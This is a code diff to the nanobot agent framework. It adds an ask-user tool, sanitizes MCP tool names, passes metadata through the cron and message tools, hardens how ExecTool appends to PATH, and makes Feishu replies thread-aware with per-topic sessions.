@ -735,8 +763,8 @@ class AgentRunner:
|
||||
"detail": result.replace("\n", " ").strip()[:120],
|
||||
}
|
||||
if spec.fail_on_tool_error:
|
||||
return result + _HINT, event, RuntimeError(result)
|
||||
return result + _HINT, event, None
|
||||
return result + hint, event, RuntimeError(result)
|
||||
return result + hint, event, None
|
||||
|
||||
detail = "" if result is None else str(result)
|
||||
detail = detail.replace("\n", " ").strip()
|
||||
|
||||
@ -96,6 +96,11 @@ class SubagentManager:
|
||||
self._task_statuses: dict[str, SubagentStatus] = {}
|
||||
self._session_tasks: dict[str, set[str]] = {} # session_key -> {task_id, ...}
|
||||
|
||||
def set_provider(self, provider: LLMProvider, model: str) -> None:
|
||||
self.provider = provider
|
||||
self.model = model
|
||||
self.runner.provider = provider
|
||||
|
||||
async def spawn(
|
||||
self,
|
||||
task: str,
|
||||
|
||||
136
nanobot/agent/tools/ask.py
Normal file
136
nanobot/agent/tools/ask.py
Normal file
@ -0,0 +1,136 @@
|
||||
"""Tool for pausing a turn until the user answers."""
|
||||
|
||||
import json
|
||||
from typing import Any
|
||||
|
||||
from nanobot.agent.tools.base import Tool, tool_parameters
|
||||
from nanobot.agent.tools.schema import ArraySchema, StringSchema, tool_parameters_schema
|
||||
|
||||
STRUCTURED_BUTTON_CHANNELS = frozenset({"telegram", "websocket"})
|
||||
|
||||
|
||||
class AskUserInterrupt(BaseException):
|
||||
"""Internal signal: the runner should stop and wait for user input."""
|
||||
|
||||
def __init__(self, question: str, options: list[str] | None = None) -> None:
|
||||
self.question = question
|
||||
self.options = [str(option) for option in (options or []) if str(option)]
|
||||
super().__init__(question)
|
||||
|
||||
|
||||
@tool_parameters(
|
||||
tool_parameters_schema(
|
||||
question=StringSchema(
|
||||
"The question to ask before continuing. Use this only when the task needs the user's answer."
|
||||
),
|
||||
options=ArraySchema(
|
||||
StringSchema("A possible answer label"),
|
||||
description="Optional choices. The user may still reply with free text.",
|
||||
),
|
||||
required=["question"],
|
||||
)
|
||||
)
|
||||
class AskUserTool(Tool):
|
||||
"""Ask the user a blocking question."""
|
||||
|
||||
@property
|
||||
def name(self) -> str:
|
||||
return "ask_user"
|
||||
|
||||
@property
|
||||
def description(self) -> str:
|
||||
return (
|
||||
"Pause and ask the user a question when their answer is required to continue. "
|
||||
"Use options for likely answers; the user's reply, typed or selected, is returned as the tool result. "
|
||||
"For non-blocking notifications or buttons, use the message tool instead."
|
||||
)
|
||||
|
||||
@property
|
||||
def exclusive(self) -> bool:
|
||||
return True
|
||||
|
||||
async def execute(self, question: str, options: list[str] | None = None, **_: Any) -> Any:
|
||||
raise AskUserInterrupt(question=question, options=options)
|
||||
|
||||
|
||||
def _tool_call_name(tool_call: dict[str, Any]) -> str:
|
||||
function = tool_call.get("function")
|
||||
if isinstance(function, dict) and isinstance(function.get("name"), str):
|
||||
return function["name"]
|
||||
name = tool_call.get("name")
|
||||
return name if isinstance(name, str) else ""
|
||||
|
||||
|
||||
def _tool_call_arguments(tool_call: dict[str, Any]) -> dict[str, Any]:
|
||||
function = tool_call.get("function")
|
||||
raw = function.get("arguments") if isinstance(function, dict) else tool_call.get("arguments")
|
||||
if isinstance(raw, dict):
|
||||
return raw
|
||||
if isinstance(raw, str):
|
||||
try:
|
||||
parsed = json.loads(raw)
|
||||
except json.JSONDecodeError:
|
||||
return {}
|
||||
return parsed if isinstance(parsed, dict) else {}
|
||||
return {}
|
||||
|
||||
|
||||
def pending_ask_user_id(history: list[dict[str, Any]]) -> str | None:
|
||||
pending: dict[str, str] = {}
|
||||
for message in history:
|
||||
if message.get("role") == "assistant":
|
||||
for tool_call in message.get("tool_calls") or []:
|
||||
if isinstance(tool_call, dict) and isinstance(tool_call.get("id"), str):
|
||||
pending[tool_call["id"]] = _tool_call_name(tool_call)
|
||||
elif message.get("role") == "tool":
|
||||
tool_call_id = message.get("tool_call_id")
|
||||
if isinstance(tool_call_id, str):
|
||||
pending.pop(tool_call_id, None)
|
||||
for tool_call_id, name in reversed(pending.items()):
|
||||
if name == "ask_user":
|
||||
return tool_call_id
|
||||
return None
|
||||
|
||||
|
||||
def ask_user_tool_result_messages(
|
||||
system_prompt: str,
|
||||
history: list[dict[str, Any]],
|
||||
tool_call_id: str,
|
||||
content: str,
|
||||
) -> list[dict[str, Any]]:
|
||||
return [
|
||||
{"role": "system", "content": system_prompt},
|
||||
*history,
|
||||
{
|
||||
"role": "tool",
|
||||
"tool_call_id": tool_call_id,
|
||||
"name": "ask_user",
|
||||
"content": content,
|
||||
},
|
||||
]
|
||||
|
||||
|
||||
def ask_user_options_from_messages(messages: list[dict[str, Any]]) -> list[str]:
|
||||
for message in reversed(messages):
|
||||
if message.get("role") != "assistant":
|
||||
continue
|
||||
for tool_call in reversed(message.get("tool_calls") or []):
|
||||
if not isinstance(tool_call, dict) or _tool_call_name(tool_call) != "ask_user":
|
||||
continue
|
||||
options = _tool_call_arguments(tool_call).get("options")
|
||||
if isinstance(options, list):
|
||||
return [str(option) for option in options if isinstance(option, str)]
|
||||
return []
|
||||
|
||||
|
||||
def ask_user_outbound(
|
||||
content: str | None,
|
||||
options: list[str],
|
||||
channel: str,
|
||||
) -> tuple[str | None, list[list[str]]]:
|
||||
if not options:
|
||||
return content, []
|
||||
if channel in STRUCTURED_BUTTON_CHANNELS:
|
||||
return content, [options]
|
||||
option_text = "\n".join(f"{index}. {option}" for index, option in enumerate(options, 1))
|
||||
return f"{content}\n\n{option_text}" if content else option_text, []
|
||||
@ -60,12 +60,19 @@ class CronTool(Tool):
|
||||
self._default_timezone = default_timezone
|
||||
self._channel: ContextVar[str] = ContextVar("cron_channel", default="")
|
||||
self._chat_id: ContextVar[str] = ContextVar("cron_chat_id", default="")
|
||||
self._metadata: ContextVar[dict] = ContextVar("cron_metadata", default={})
|
||||
self._session_key: ContextVar[str] = ContextVar("cron_session_key", default="")
|
||||
self._in_cron_context: ContextVar[bool] = ContextVar("cron_in_context", default=False)
|
||||
|
||||
def set_context(self, channel: str, chat_id: str) -> None:
|
||||
def set_context(
|
||||
self, channel: str, chat_id: str,
|
||||
metadata: dict | None = None, session_key: str | None = None,
|
||||
) -> None:
|
||||
"""Set the current session context for delivery."""
|
||||
self._channel.set(channel)
|
||||
self._chat_id.set(chat_id)
|
||||
self._metadata.set(metadata or {})
|
||||
self._session_key.set(session_key or f"{channel}:{chat_id}")
|
||||
|
||||
def set_cron_context(self, active: bool):
|
||||
"""Mark whether the tool is executing inside a cron job callback."""
|
||||
@ -199,6 +206,8 @@ class CronTool(Tool):
|
||||
channel=channel,
|
||||
to=chat_id,
|
||||
delete_after_run=delete_after,
|
||||
channel_meta=self._metadata.get(),
|
||||
session_key=self._session_key.get() or None,
|
||||
)
|
||||
return f"Created job '{job.name}' (id: {job.id})"
|
||||
|
||||
|
||||
@ -2,6 +2,7 @@
|
||||
|
||||
import asyncio
|
||||
import os
|
||||
import re
|
||||
import shutil
|
||||
from contextlib import AsyncExitStack
|
||||
from typing import Any
|
||||
@ -28,6 +29,15 @@ _TRANSIENT_EXC_NAMES: frozenset[str] = frozenset((
|
||||
|
||||
_WINDOWS_SHELL_LAUNCHERS: frozenset[str] = frozenset(("npx", "npm", "pnpm", "yarn", "bunx"))
|
||||
|
||||
# Characters allowed in tool names by model providers (Anthropic, OpenAI, etc.).
|
||||
# Replace anything outside [a-zA-Z0-9_-] with underscore and collapse runs.
|
||||
_SANITIZE_RE = re.compile(r"_+")
|
||||
|
||||
|
||||
def _sanitize_name(name: str) -> str:
|
||||
"""Sanitize an MCP-derived name for model API compatibility."""
|
||||
return _SANITIZE_RE.sub("_", re.sub(r"[^a-zA-Z0-9_-]", "_", name))
|
||||
|
||||
|
||||
def _is_transient(exc: BaseException) -> bool:
|
||||
"""Check if an exception looks like a transient connection error."""
|
||||
@ -137,7 +147,7 @@ class MCPToolWrapper(Tool):
|
||||
def __init__(self, session, server_name: str, tool_def, tool_timeout: int = 30):
|
||||
self._session = session
|
||||
self._original_name = tool_def.name
|
||||
self._name = f"mcp_{server_name}_{tool_def.name}"
|
||||
self._name = _sanitize_name(f"mcp_{server_name}_{tool_def.name}")
|
||||
self._description = tool_def.description or tool_def.name
|
||||
raw_schema = tool_def.inputSchema or {"type": "object", "properties": {}}
|
||||
self._parameters = _normalize_schema_for_openai(raw_schema)
|
||||
@ -221,7 +231,7 @@ class MCPResourceWrapper(Tool):
|
||||
def __init__(self, session, server_name: str, resource_def, resource_timeout: int = 30):
|
||||
self._session = session
|
||||
self._uri = resource_def.uri
|
||||
self._name = f"mcp_{server_name}_resource_{resource_def.name}"
|
||||
self._name = _sanitize_name(f"mcp_{server_name}_resource_{resource_def.name}")
|
||||
desc = resource_def.description or resource_def.name
|
||||
self._description = f"[MCP Resource] {desc}\nURI: {self._uri}"
|
||||
self._parameters: dict[str, Any] = {
|
||||
@ -311,7 +321,7 @@ class MCPPromptWrapper(Tool):
|
||||
def __init__(self, session, server_name: str, prompt_def, prompt_timeout: int = 30):
|
||||
self._session = session
|
||||
self._prompt_name = prompt_def.name
|
||||
self._name = f"mcp_{server_name}_prompt_{prompt_def.name}"
|
||||
self._name = _sanitize_name(f"mcp_{server_name}_prompt_{prompt_def.name}")
|
||||
desc = prompt_def.description or prompt_def.name
|
||||
self._description = (
|
||||
f"[MCP Prompt] {desc}\n"
|
||||
@ -514,9 +524,9 @@ async def connect_mcp_servers(
|
||||
registered_count = 0
|
||||
matched_enabled_tools: set[str] = set()
|
||||
available_raw_names = [tool_def.name for tool_def in tools.tools]
|
||||
available_wrapped_names = [f"mcp_{name}_{tool_def.name}" for tool_def in tools.tools]
|
||||
available_wrapped_names = [_sanitize_name(f"mcp_{name}_{tool_def.name}") for tool_def in tools.tools]
|
||||
for tool_def in tools.tools:
|
||||
wrapped_name = f"mcp_{name}_{tool_def.name}"
|
||||
wrapped_name = _sanitize_name(f"mcp_{name}_{tool_def.name}")
|
||||
if (
|
||||
not allow_all_tools
|
||||
and tool_def.name not in enabled_tools
|
||||
|
||||
@ -1,11 +1,14 @@
|
||||
"""Message tool for sending messages to users."""
|
||||
|
||||
import os
|
||||
from contextvars import ContextVar
|
||||
from pathlib import Path
|
||||
from typing import Any, Awaitable, Callable
|
||||
|
||||
from nanobot.agent.tools.base import Tool, tool_parameters
|
||||
from nanobot.agent.tools.schema import ArraySchema, StringSchema, tool_parameters_schema
|
||||
from nanobot.bus.events import OutboundMessage
|
||||
from nanobot.config.paths import get_workspace_path
|
||||
|
||||
|
||||
@tool_parameters(
|
||||
@ -33,21 +36,38 @@ class MessageTool(Tool):
|
||||
default_channel: str = "",
|
||||
default_chat_id: str = "",
|
||||
default_message_id: str | None = None,
|
||||
workspace: str | Path | None = None,
|
||||
):
|
||||
self._send_callback = send_callback
|
||||
self._workspace = Path(workspace).expanduser() if workspace is not None else get_workspace_path()
|
||||
self._default_channel: ContextVar[str] = ContextVar("message_default_channel", default=default_channel)
|
||||
self._default_chat_id: ContextVar[str] = ContextVar("message_default_chat_id", default=default_chat_id)
|
||||
self._default_message_id: ContextVar[str | None] = ContextVar(
|
||||
"message_default_message_id",
|
||||
default=default_message_id,
|
||||
)
|
||||
self._default_metadata: ContextVar[dict[str, Any]] = ContextVar(
|
||||
"message_default_metadata",
|
||||
default={},
|
||||
)
|
||||
self._sent_in_turn_var: ContextVar[bool] = ContextVar("message_sent_in_turn", default=False)
|
||||
self._record_channel_delivery_var: ContextVar[bool] = ContextVar(
|
||||
"message_record_channel_delivery",
|
||||
default=False,
|
||||
)
|
||||
|
||||
def set_context(self, channel: str, chat_id: str, message_id: str | None = None) -> None:
|
||||
def set_context(
|
||||
self,
|
||||
channel: str,
|
||||
chat_id: str,
|
||||
message_id: str | None = None,
|
||||
metadata: dict[str, Any] | None = None,
|
||||
) -> None:
|
||||
"""Set the current message context."""
|
||||
self._default_channel.set(channel)
|
||||
self._default_chat_id.set(chat_id)
|
||||
self._default_message_id.set(message_id)
|
||||
self._default_metadata.set(metadata or {})
|
||||
|
||||
def set_send_callback(self, callback: Callable[[OutboundMessage], Awaitable[None]]) -> None:
|
||||
"""Set the callback for sending messages."""
|
||||
@ -57,6 +77,14 @@ class MessageTool(Tool):
|
||||
"""Reset per-turn send tracking."""
|
||||
self._sent_in_turn = False
|
||||
|
||||
def set_record_channel_delivery(self, active: bool):
|
||||
"""Mark tool-sent messages as proactive channel deliveries."""
|
||||
return self._record_channel_delivery_var.set(active)
|
||||
|
||||
def reset_record_channel_delivery(self, token) -> None:
|
||||
"""Restore previous proactive delivery recording state."""
|
||||
self._record_channel_delivery_var.reset(token)
|
||||
|
||||
@property
|
||||
def _sent_in_turn(self) -> bool:
|
||||
return self._sent_in_turn_var.get()
|
||||
@ -106,7 +134,8 @@ class MessageTool(Tool):
|
||||
# some channels (e.g. Feishu) use it to determine the target
|
||||
# conversation via their Reply API, which would route the message
|
||||
# to the wrong chat entirely.
|
||||
if channel == default_channel and chat_id == default_chat_id:
|
||||
same_target = channel == default_channel and chat_id == default_chat_id
|
||||
if same_target:
|
||||
message_id = message_id or self._default_message_id.get()
|
||||
else:
|
||||
message_id = None
|
||||
@ -117,15 +146,28 @@ class MessageTool(Tool):
|
||||
if not self._send_callback:
|
||||
return "Error: Message sending not configured"
|
||||
|
||||
if media:
|
||||
resolved = []
|
||||
for p in media:
|
||||
if p.startswith(("http://", "https://")) or os.path.isabs(p):
|
||||
resolved.append(p)
|
||||
else:
|
||||
resolved.append(str(self._workspace / p))
|
||||
media = resolved
|
||||
|
||||
metadata = dict(self._default_metadata.get()) if same_target else {}
|
||||
if message_id:
|
||||
metadata["message_id"] = message_id
|
||||
if self._record_channel_delivery_var.get():
|
||||
metadata["_record_channel_delivery"] = True
|
||||
|
||||
msg = OutboundMessage(
|
||||
channel=channel,
|
||||
chat_id=chat_id,
|
||||
content=content,
|
||||
media=media or [],
|
||||
buttons=buttons or [],
|
||||
metadata={
|
||||
"message_id": message_id,
|
||||
} if message_id else {},
|
||||
metadata=metadata,
|
||||
)
|
||||
|
||||
try:
|
||||
|
||||
@ -136,9 +136,10 @@ class ExecTool(Tool):
|
||||
|
||||
if self.path_append:
|
||||
if _IS_WINDOWS:
|
||||
env["PATH"] = env.get("PATH", "") + ";" + self.path_append
|
||||
env["PATH"] = env.get("PATH", "") + os.pathsep + self.path_append
|
||||
else:
|
||||
command = f'export PATH="$PATH:{self.path_append}"; {command}'
|
||||
env["NANOBOT_PATH_APPEND"] = self.path_append
|
||||
command = f'export PATH="$PATH{os.pathsep}$NANOBOT_PATH_APPEND"; {command}'
|
||||
|
||||
try:
|
||||
process = await self._spawn(command, cwd, env)
|
||||
@ -298,8 +299,8 @@ class ExecTool(Tool):
|
||||
continue
|
||||
|
||||
media_path = get_media_dir().resolve()
|
||||
if (p.is_absolute()
|
||||
and cwd_path not in p.parents
|
||||
if (p.is_absolute()
|
||||
and cwd_path not in p.parents
|
||||
and p != cwd_path
|
||||
and media_path not in p.parents
|
||||
and p != media_path
|
||||
|
||||
@ -13,6 +13,7 @@ from dataclasses import dataclass
|
||||
from typing import Any, Literal
|
||||
|
||||
from lark_oapi.api.im.v1.model import MentionEvent, P2ImMessageReceiveV1
|
||||
from lark_oapi.core.const import FEISHU_DOMAIN, LARK_DOMAIN
|
||||
from loguru import logger
|
||||
from pydantic import Field
|
||||
|
||||
@ -22,8 +23,6 @@ from nanobot.channels.base import BaseChannel
|
||||
from nanobot.config.paths import get_media_dir
|
||||
from nanobot.config.schema import Base
|
||||
|
||||
from lark_oapi.core.const import FEISHU_DOMAIN, LARK_DOMAIN
|
||||
|
||||
FEISHU_AVAILABLE = importlib.util.find_spec("lark_oapi") is not None
|
||||
|
||||
# Message type display mapping
|
||||
@ -308,6 +307,8 @@ class FeishuChannel(BaseChannel):
|
||||
self._loop: asyncio.AbstractEventLoop | None = None
|
||||
self._stream_bufs: dict[str, _FeishuStreamBuf] = {}
|
||||
self._bot_open_id: str | None = None
|
||||
self._background_tasks: set[asyncio.Task] = set()
|
||||
self._reaction_ids: dict[str, str] = {} # message_id → reaction_id
|
||||
|
||||
@staticmethod
|
||||
def _register_optional_event(builder: Any, method_name: str, handler: Any) -> Any:
|
||||
@ -549,8 +550,11 @@ class FeishuChannel(BaseChannel):
|
||||
return None
|
||||
|
||||
async def _add_reaction(self, message_id: str, emoji_type: str = "THUMBSUP") -> str | None:
|
||||
"""
|
||||
Add a reaction emoji to a message (non-blocking).
|
||||
"""Add a reaction emoji to a message.
|
||||
|
||||
Returns the reaction_id on success, None on failure.
|
||||
When called via a tracked background task, the returned reaction_id
|
||||
is stored in ``_reaction_ids`` for later cleanup by ``send_delta``.
|
||||
|
||||
Common emoji types: THUMBSUP, OK, EYES, DONE, OnIt, HEART
|
||||
"""
|
||||
@ -594,6 +598,36 @@ class FeishuChannel(BaseChannel):
|
||||
loop = asyncio.get_running_loop()
|
||||
await loop.run_in_executor(None, self._remove_reaction_sync, message_id, reaction_id)
|
||||
|
||||
def _on_background_task_done(self, task: asyncio.Task) -> None:
|
||||
"""Callback: remove from tracking set and log unhandled exceptions."""
|
||||
self._background_tasks.discard(task)
|
||||
if task.cancelled():
|
||||
return
|
||||
try:
|
||||
task.result()
|
||||
except Exception as exc:
|
||||
logger.warning("Background task failed: {}", exc)
|
||||
|
||||
def _on_reaction_added(self, message_id: str, task: asyncio.Task) -> None:
|
||||
"""Callback: store reaction_id after background add-reaction completes."""
|
||||
if task.cancelled():
|
||||
return
|
||||
try:
|
||||
reaction_id = task.result()
|
||||
if reaction_id:
|
||||
self._reaction_ids[message_id] = reaction_id
|
||||
except Exception:
|
||||
pass # already logged by _on_background_task_done
|
||||
# Trim cache to prevent unbounded growth
|
||||
if len(self._reaction_ids) > 500:
|
||||
self._reaction_ids.pop(next(iter(self._reaction_ids)))
|
||||
|
||||
@staticmethod
|
||||
def _stream_key(chat_id: str, metadata: dict[str, Any] | None = None) -> str:
|
||||
"""Scope streaming buffers to the inbound message when available."""
|
||||
meta = metadata or {}
|
||||
return meta.get("message_id") or chat_id
|
||||
|
||||
# Regex to match markdown tables (header + separator + data rows)
|
||||
_TABLE_RE = re.compile(
|
||||
r"((?:^[ \t]*\|.+\|[ \t]*\n)(?:^[ \t]*\|[-:\s|]+\|[ \t]*\n)(?:^[ \t]*\|.+\|[ \t]*\n?)+)",
|
||||
@ -1101,17 +1135,23 @@ class FeishuChannel(BaseChannel):
|
||||
logger.debug("Feishu: error fetching parent message {}: {}", message_id, e)
|
||||
return None
|
||||
|
||||
def _reply_message_sync(self, parent_message_id: str, msg_type: str, content: str) -> bool:
|
||||
"""Reply to an existing Feishu message using the Reply API (synchronous)."""
|
||||
def _reply_message_sync(self, parent_message_id: str, msg_type: str, content: str, *, reply_in_thread: bool = False) -> bool:
|
||||
"""Reply to an existing Feishu message using the Reply API (synchronous).
|
||||
|
||||
Args:
|
||||
reply_in_thread: If True, reply as a thread/topic message
|
||||
in the Feishu client.
|
||||
"""
|
||||
from lark_oapi.api.im.v1 import ReplyMessageRequest, ReplyMessageRequestBody
|
||||
|
||||
try:
|
||||
body_builder = ReplyMessageRequestBody.builder().msg_type(msg_type).content(content)
|
||||
if reply_in_thread:
|
||||
body_builder = body_builder.reply_in_thread(True)
|
||||
request = (
|
||||
ReplyMessageRequest.builder()
|
||||
.message_id(parent_message_id)
|
||||
.request_body(
|
||||
ReplyMessageRequestBody.builder().msg_type(msg_type).content(content).build()
|
||||
)
|
||||
.request_body(body_builder.build())
|
||||
.build()
|
||||
)
|
||||
response = self._client.im.v1.message.reply(request)
|
||||
@ -1166,8 +1206,19 @@ class FeishuChannel(BaseChannel):
|
||||
logger.error("Error sending Feishu {} message: {}", msg_type, e)
|
||||
return None
|
||||
|
||||
def _create_streaming_card_sync(self, receive_id_type: str, chat_id: str) -> str | None:
|
||||
"""Create a CardKit streaming card, send it to chat, return card_id."""
|
||||
def _create_streaming_card_sync(
|
||||
self,
|
||||
receive_id_type: str,
|
||||
chat_id: str,
|
||||
reply_message_id: str | None = None,
|
||||
) -> str | None:
|
||||
"""Create a CardKit streaming card, send it to chat, return card_id.
|
||||
|
||||
When *reply_message_id* is provided the card is delivered via the
|
||||
reply API (with reply_in_thread=True) so it lands inside the
|
||||
originating thread / topic. Otherwise the plain create-message
|
||||
API is used.
|
||||
"""
|
||||
from lark_oapi.api.cardkit.v1 import CreateCardRequest, CreateCardRequestBody
|
||||
|
||||
card_json = {
|
||||
@ -1196,13 +1247,19 @@ class FeishuChannel(BaseChannel):
|
||||
return None
|
||||
card_id = getattr(response.data, "card_id", None)
|
||||
if card_id:
|
||||
message_id = self._send_message_sync(
|
||||
receive_id_type,
|
||||
chat_id,
|
||||
"interactive",
|
||||
json.dumps({"type": "card", "data": {"card_id": card_id}}),
|
||||
card_content = json.dumps(
|
||||
{"type": "card", "data": {"card_id": card_id}}, ensure_ascii=False
|
||||
)
|
||||
if message_id:
|
||||
if reply_message_id:
|
||||
sent = self._reply_message_sync(
|
||||
reply_message_id, "interactive", card_content,
|
||||
reply_in_thread=True,
|
||||
)
|
||||
else:
|
||||
sent = self._send_message_sync(
|
||||
receive_id_type, chat_id, "interactive", card_content,
|
||||
) is not None
|
||||
if sent:
|
||||
return card_id
|
||||
logger.warning(
|
||||
"Created streaming card {} but failed to send it to {}", card_id, chat_id
|
||||
@ -1292,23 +1349,27 @@ class FeishuChannel(BaseChannel):
|
||||
_stream_end: Finalize the streaming card.
|
||||
_tool_hint: Delta is a formatted tool hint (for display only).
|
||||
message_id: Original message id (used with _stream_end for reaction cleanup).
|
||||
reaction_id: Reaction id to remove on stream end.
|
||||
chat_type: "group" or "p2p" — controls reply-in-thread for streaming cards.
|
||||
"""
|
||||
if not self._client:
|
||||
return
|
||||
meta = metadata or {}
|
||||
stream_key = self._stream_key(chat_id, meta)
|
||||
loop = asyncio.get_running_loop()
|
||||
rid_type = "chat_id" if chat_id.startswith("oc_") else "open_id"
|
||||
|
||||
# --- stream end: final update or fallback ---
|
||||
if meta.get("_stream_end"):
|
||||
if (message_id := meta.get("message_id")) and (reaction_id := meta.get("reaction_id")):
|
||||
await self._remove_reaction(message_id, reaction_id)
|
||||
message_id = meta.get("message_id")
|
||||
if message_id:
|
||||
reaction_id = self._reaction_ids.pop(message_id, None)
|
||||
if reaction_id:
|
||||
await self._remove_reaction(message_id, reaction_id)
|
||||
# Add completion emoji if configured
|
||||
if self.config.done_emoji and message_id:
|
||||
if self.config.done_emoji:
|
||||
await self._add_reaction(message_id, self.config.done_emoji)
|
||||
|
||||
buf = self._stream_bufs.pop(chat_id, None)
|
||||
buf = self._stream_bufs.pop(stream_key, None)
|
||||
if not buf or not buf.text:
|
||||
return
|
||||
# Try to finalize via streaming card; if that fails (e.g.
|
||||
@ -1343,24 +1404,45 @@ class FeishuChannel(BaseChannel):
|
||||
{"config": {"wide_screen_mode": True}, "elements": chunk},
|
||||
ensure_ascii=False,
|
||||
)
|
||||
await loop.run_in_executor(
|
||||
None, self._send_message_sync, rid_type, chat_id, "interactive", card
|
||||
)
|
||||
# Fallback: reply via the Reply API for group chats.
|
||||
# Target message_id — the Feishu API keeps the reply in
|
||||
# the same topic automatically.
|
||||
_f_msg = meta.get("message_id")
|
||||
fallback_msg_id = _f_msg if meta.get("chat_type", "group") == "group" else None
|
||||
if fallback_msg_id:
|
||||
await loop.run_in_executor(
|
||||
None, lambda: self._reply_message_sync(
|
||||
fallback_msg_id, "interactive", card,
|
||||
reply_in_thread=True,
|
||||
),
|
||||
)
|
||||
else:
|
||||
await loop.run_in_executor(
|
||||
None, self._send_message_sync, rid_type, chat_id, "interactive", card
|
||||
)
|
||||
return
|
||||
|
||||
# --- accumulate delta ---
|
||||
buf = self._stream_bufs.get(chat_id)
|
||||
buf = self._stream_bufs.get(stream_key)
|
||||
if buf is None:
|
||||
buf = _FeishuStreamBuf()
|
||||
self._stream_bufs[chat_id] = buf
|
||||
self._stream_bufs[stream_key] = buf
|
||||
buf.text += delta
|
||||
if not buf.text.strip():
|
||||
return
|
||||
|
||||
now = time.monotonic()
|
||||
if buf.card_id is None:
|
||||
# Send the streaming card as a reply for group chats so it
|
||||
# lands inside the originating topic/thread. Always target
|
||||
# message_id (the actual inbound message) — the Feishu Reply
|
||||
# API keeps the response in the same topic automatically.
|
||||
is_group = meta.get("chat_type", "group") == "group"
|
||||
reply_msg_id = meta.get("message_id") if is_group else None
|
||||
card_id = await loop.run_in_executor(
|
||||
None, self._create_streaming_card_sync, rid_type, chat_id
|
||||
None,
|
||||
self._create_streaming_card_sync,
|
||||
rid_type, chat_id, reply_msg_id,
|
||||
)
|
||||
if card_id:
|
||||
buf.card_id = card_id
|
||||
@ -1393,7 +1475,7 @@ class FeishuChannel(BaseChannel):
|
||||
hint = (msg.content or "").strip()
|
||||
if not hint:
|
||||
return
|
||||
buf = self._stream_bufs.get(msg.chat_id)
|
||||
buf = self._stream_bufs.get(self._stream_key(msg.chat_id, msg.metadata))
|
||||
if buf and buf.card_id:
|
||||
# Delegate to send_delta so tool hints get the same
|
||||
# throttling (and card creation) as regular text deltas.
|
||||
@ -1404,37 +1486,59 @@ class FeishuChannel(BaseChannel):
|
||||
return
|
||||
# No active streaming card — send as a regular
|
||||
# interactive card with the same 🔧 prefix style.
|
||||
# Use reply API for group chats so the hint stays in topic.
|
||||
card = json.dumps(
|
||||
{"config": {"wide_screen_mode": True}, "elements": [
|
||||
{"tag": "markdown", "content": self._format_tool_hint_delta(hint)},
|
||||
]},
|
||||
ensure_ascii=False,
|
||||
)
|
||||
await loop.run_in_executor(
|
||||
None, self._send_message_sync, receive_id_type, msg.chat_id, "interactive", card
|
||||
)
|
||||
_th_msg_id = msg.metadata.get("message_id")
|
||||
_th_chat_type = msg.metadata.get("chat_type", "group")
|
||||
if _th_msg_id and _th_chat_type == "group":
|
||||
await loop.run_in_executor(
|
||||
None, lambda: self._reply_message_sync(
|
||||
_th_msg_id, "interactive", card,
|
||||
reply_in_thread=True,
|
||||
),
|
||||
)
|
||||
else:
|
||||
await loop.run_in_executor(
|
||||
None, self._send_message_sync, receive_id_type, msg.chat_id, "interactive", card
|
||||
)
|
||||
return
|
||||
|
||||
# Determine whether the first message should quote the user's message.
|
||||
# Only the very first send (media or text) in this call uses reply; subsequent
|
||||
# chunks/media fall back to plain create to avoid redundant quote bubbles.
|
||||
# Always target message_id — the Feishu Reply API keeps replies in the
|
||||
# same topic automatically when the target message is inside a topic.
|
||||
reply_message_id: str | None = None
|
||||
_msg_id = msg.metadata.get("message_id")
|
||||
if self.config.reply_to_message and not msg.metadata.get("_progress", False):
|
||||
reply_message_id = msg.metadata.get("message_id") or None
|
||||
reply_message_id = _msg_id
|
||||
# For topic group messages, always reply to keep context in thread
|
||||
elif msg.metadata.get("thread_id"):
|
||||
reply_message_id = (
|
||||
msg.metadata.get("root_id") or msg.metadata.get("message_id") or None
|
||||
)
|
||||
reply_message_id = _msg_id
|
||||
|
||||
first_send = True # tracks whether the reply has already been used
|
||||
|
||||
def _do_send(m_type: str, content: str) -> None:
|
||||
"""Send via reply (first message) or create (subsequent)."""
|
||||
"""Send via reply (first message) or create (subsequent).
|
||||
|
||||
For group chats the reply API always uses reply_in_thread=True.
|
||||
The Feishu API automatically keeps replies inside existing
|
||||
topics — reply_in_thread only creates a *new* topic when the
|
||||
target message is a plain (non-topic) message.
|
||||
"""
|
||||
nonlocal first_send
|
||||
if reply_message_id and first_send:
|
||||
first_send = False
|
||||
ok = self._reply_message_sync(reply_message_id, m_type, content)
|
||||
chat_type = msg.metadata.get("chat_type", "group")
|
||||
ok = self._reply_message_sync(
|
||||
reply_message_id, m_type, content,
|
||||
reply_in_thread=chat_type == "group",
|
||||
)
|
||||
if ok:
|
||||
return
|
||||
# Fall back to regular send if reply fails
|
||||
@ -1543,8 +1647,13 @@ class FeishuChannel(BaseChannel):
|
||||
logger.debug("Feishu: skipping group message (not mentioned)")
|
||||
return
|
||||
|
||||
# Add reaction
|
||||
reaction_id = await self._add_reaction(message_id, self.config.react_emoji)
|
||||
# Add reaction (non-blocking — tracked background task)
|
||||
task = asyncio.create_task(
|
||||
self._add_reaction(message_id, self.config.react_emoji)
|
||||
)
|
||||
self._background_tasks.add(task)
|
||||
task.add_done_callback(self._on_background_task_done)
|
||||
task.add_done_callback(lambda t: self._on_reaction_added(message_id, t))
|
||||
|
||||
# Parse content
|
||||
content_parts = []
|
||||
@ -1624,6 +1733,15 @@ class FeishuChannel(BaseChannel):
|
||||
if not content and not media_paths:
|
||||
return
|
||||
|
||||
# Build topic-scoped session key for conversation isolation.
|
||||
# Group chat: each topic gets its own session via root_id (replies
|
||||
# inside a topic) or message_id (top-level messages start a new topic).
|
||||
# Private chat: no override — same behavior as Telegram/Slack.
|
||||
if chat_type == "group":
|
||||
session_key = f"feishu:{chat_id}:{root_id or message_id}"
|
||||
else:
|
||||
session_key = None
|
||||
|
||||
# Forward to message bus
|
||||
reply_to = chat_id if chat_type == "group" else sender_id
|
||||
await self._handle_message(
|
||||
@ -1633,13 +1751,13 @@ class FeishuChannel(BaseChannel):
|
||||
media=media_paths,
|
||||
metadata={
|
||||
"message_id": message_id,
|
||||
"reaction_id": reaction_id,
|
||||
"chat_type": chat_type,
|
||||
"msg_type": msg_type,
|
||||
"parent_id": parent_id,
|
||||
"root_id": root_id,
|
||||
"thread_id": thread_id,
|
||||
},
|
||||
session_key=session_key,
|
||||
)
|
||||
|
||||
except Exception as e:
|
||||
|
||||
@ -172,6 +172,7 @@ class ChannelManager:
|
||||
channel=notice.channel,
|
||||
chat_id=notice.chat_id,
|
||||
content=format_restart_completed_message(notice.started_at_raw),
|
||||
metadata=dict(notice.metadata or {}),
|
||||
),
|
||||
))
|
||||
|
||||
|
||||
